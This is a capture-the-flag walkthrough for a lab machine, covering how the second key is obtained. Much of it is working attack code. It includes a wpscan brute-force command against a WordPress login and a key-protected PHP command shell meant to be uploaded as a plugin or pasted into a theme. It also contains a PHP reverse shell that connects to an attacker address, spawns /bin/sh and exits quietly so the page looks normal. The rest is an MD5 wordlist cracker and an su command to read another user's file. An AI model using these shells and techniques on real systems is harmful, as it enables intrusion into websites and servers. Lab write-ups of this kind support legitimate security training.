In the previous article we got the first key. For the second key we need to move a notch higher into the system. We have a wordlist, loot.dic, and since the web application is the only thing facing us so far, the best option is to brute-force the WordPress login with it:
root@mth3l3m3nt:~# wpscan -u http://192.168.238.101/ -U hacker123 -w ~/loot.dic -t 16
This gives us the password to the web application; we already had the username from the time we handled key 1, as shown below. (The short flags above are from an older wpscan release; current versions spell them --url, --usernames and --passwords.)
With a valid username and password it becomes much easier to pivot into the server itself. WordPress offers a number of avenues to get a shell on the system:
- Edit an existing plugin's or theme's code through the built-in editor and insert a minimal shell; it runs from wherever that file lives under wp-content/themes or wp-content/plugins.
- Upload a PHP shell through the "Add New" plugin function (it has to be packaged as a zip with a plugin header); it lands in the wp-content/plugins folder and is reachable by URL even if the plugin is never activated.
- Upload a PHP shell to the media library; it lands in the wp-content/uploads folder. A default install rejects .php uploads, so this route depends on a lax configuration.
The first shell is a minimal test to get a feel for the server. I edited the theme to add it, as below, using mth3l3m3nt as the controller.
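The minimal shell I used is shown in the screenshot above. As an added example (my own code, not the walkthrough's original snippet), the file below does the same job through either of the first two routes: zipped and uploaded as a plugin, or pasted into a theme file such as footer.php. The shared secret "mth3l3m3nt" and the parameter names k and cmd are assumptions, chosen so nobody else on the lab network can drive the shell once it is dropped.

```php
<?php
/*
Plugin Name: mth3l3m3nt test shell
Description: Added example, not the walkthrough's own code. Minimal command shell for a lab box.
*/
// The plugin header above is only needed for the Plugins > Add New route; once the
// zip is uploaded the file is reachable at wp-content/plugins/<dir>/shell.php whether
// or not the plugin is activated. Pasted into a theme file it runs on every page load.

// Shared secret (assumed value) so the shell is not usable by anyone who stumbles on it.
define('MTH_SECRET', 'mth3l3m3nt');

function mth_handle_request() {
    // Driven with ?k=<secret>&cmd=<command> (GET or POST).
    if (!isset($_REQUEST['k']) || !hash_equals(MTH_SECRET, (string) $_REQUEST['k'])) {
        return;                       // wrong or missing key: behave like an ordinary file
    }
    if (!isset($_REQUEST['cmd'])) {
        return;
    }
    if (!headers_sent()) {            // inside a theme the page body is already streaming
        header('Content-Type: text/plain');
    }
    // Merge stderr so missing binaries and permission errors show up in the reply.
    $out = shell_exec((string) $_REQUEST['cmd'] . ' 2>&1');
    echo $out === null ? "(no output)\n" : $out;
    exit;
}

mth_handle_request();
```

A first request of cmd=id answers the question the page raises below (which user the web server runs PHP as) before any effort goes into a heavier payload.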
For more persistence, however, it is easier to have a shell that connects back to a Meterpreter handler. We simply generate a PHP payload with msfvenom and set up a listener in Metasploit (exploit/multi/handler configured with the same payload, LHOST and LPORT) to receive the shell.
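To show what the generated payload actually does, here is a hand-written connect-back shell as an added example (not the msfvenom output used in the walkthrough). It gives a plain shell rather than Meterpreter, so catch it with nc -lvnp 4444 or with multi/handler and the php/reverse_php payload; for a Meterpreter session you would instead drop the msfvenom php/meterpreter/reverse_tcp payload and pair the handler with that. The attacker address 192.168.238.1 and port 4444 are assumed values.

```php
<?php
// Added example, not the walkthrough's own payload: PHP connect-back shell.
// Drop it through any of the WordPress routes above and request it once.
$lhost = '192.168.238.1';   // assumed: the attacking machine on the lab network
$lport = 4444;              // assumed: port the listener is waiting on

// Keep running even if the browser that triggered the file goes away.
ignore_user_abort(true);
set_time_limit(0);

$sock = @fsockopen($lhost, $lport, $errno, $errstr, 30);
if (!$sock) {
    // No listener yet: fail silently so the page looks normal to anyone else.
    exit;
}

// proc_open accepts an open stream in place of a pipe, so the shell's stdin,
// stdout and stderr are wired straight to the socket with no relay loop.
$spec = [0 => $sock, 1 => $sock, 2 => $sock];
$proc = proc_open('/bin/sh -i', $spec, $pipes);
if (is_resource($proc)) {
    proc_close($proc);      // blocks until the shell exits, i.e. the listener closes
}
fclose($sock);
```

Whichever payload you use, the process still runs as the web server's user; the connect-back only changes how you talk to it, not what it is allowed to read.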
The only problem so far is that, after dropping to a shell, we find we are still the user daemon, the account PHP executes as:
However, we notice that password-raw.md5 in chicken's home directory is readable by us, and it contains an MD5 hash. Cracking this is easy:
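The usual tool for this step is hashcat -m 0 or john with loot.dic. As an added example (my own code, not part of the walkthrough), the script below does the same offline: it parses a user:hash file, keeps only values that look like raw MD5, and runs a wordlist with cheap case variants against them. The sample file contents and the four-word list are constructed for the demo; the real hash from the box is not reproduced.

```php
<?php
// Added example, not from the walkthrough: offline wordlist attack on raw MD5 hashes
// of the kind found in chicken's password-raw.md5.

// Parse "user:hash" lines (a bare hash per line is accepted too) and keep only
// values that look like raw MD5, i.e. exactly 32 hex digits.
function parse_md5_file(string $contents): array {
    $targets = [];
    foreach (preg_split('/\R/', trim($contents)) as $line) {
        $line = trim($line);
        if ($line === '') {
            continue;
        }
        $parts = explode(':', $line, 2);
        [$user, $hash] = count($parts) === 2 ? $parts : ['?', $parts[0]];
        $hash = strtolower(trim($hash));
        if (preg_match('/^[0-9a-f]{32}$/', $hash)) {
            $targets[$user] = $hash;
        }
    }
    return $targets;
}

// Try every word plus lowercase and capitalised variants against every target.
function crack_md5(array $targets, array $wordlist): array {
    $found = [];
    foreach ($wordlist as $word) {
        $word = rtrim($word, "\r\n");
        foreach (array_unique([$word, strtolower($word), ucfirst($word)]) as $candidate) {
            $h = md5($candidate);
            foreach ($targets as $user => $hash) {
                if (!isset($found[$user]) && hash_equals($hash, $h)) {
                    $found[$user] = $candidate;
                }
            }
        }
        if (count($found) === count($targets)) {
            break;                                   // nothing left to crack
        }
    }
    return $found;
}

// Constructed sample: MD5 of "password" under a made-up user name.
$sample = "testuser:5f4dcc3b5aa765d61d8327deb882cf99\n";
$words  = ["letmein", "Password", "robot", "chicken"];

$targets = parse_md5_file($sample);
$cracked = crack_md5($targets, $words);
foreach ($targets as $user => $hash) {
    printf("%s:%s -> %s\n", $user, $hash, $cracked[$user] ?? '(not found)');
}

// Against the real files on the box:
//   $targets = parse_md5_file(file_get_contents('password-raw.md5'));
//   $cracked = crack_md5($targets, file('loot.dic'));
```

A raw 32-hex-digit MD5 with no salt is what makes this trivial; the same wordlist that broke the WordPress login is the first thing to try here, since password reuse between the web account and the system account is exactly what the box is testing for.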
After that, the one thing left is to read the file as chicken. From the Meterpreter session we drop to a native shell, where we are daemon, and run the command below (-c runs a single command as the target user and -s sets the shell used to run it, regardless of chicken's login shell):
su -c "cat /home/chicken/key-2-of-3.txt" -s /bin/sh chicken
If su refuses with "must be run from a terminal", upgrade the shell to a pty first and rerun it.
One key takeaway from this is to pay attention to detail. Missing the permission difference between the two files in chicken's folder (the hash file readable by everyone, the key file only by chicken) leaves you unable to predict what is required to complete the step. Voila, the second key is: